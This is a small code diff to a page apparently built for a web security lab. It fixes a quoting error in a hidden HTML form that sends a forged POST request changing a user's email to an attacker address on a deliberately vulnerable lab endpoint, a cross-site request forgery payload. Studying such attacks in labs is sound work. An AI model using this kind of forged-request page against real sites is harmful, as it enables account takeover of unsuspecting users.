--- a/views/instantattackonvuln.ejs
+++ b/views/instantattackonvuln.ejs
@@ -1,6 +1,6 @@
 <html>
     <body>
-        <form action="https://web2-lab2.onrender.com/changeemailvuln method="POST">
+        <form action="https://web2-lab2.onrender.com/changeemailvuln" method="POST">
             <input type="hidden" name="email" id="email" value="youhavebeenhacked@hacker.com" />            
         </form>
         <script>
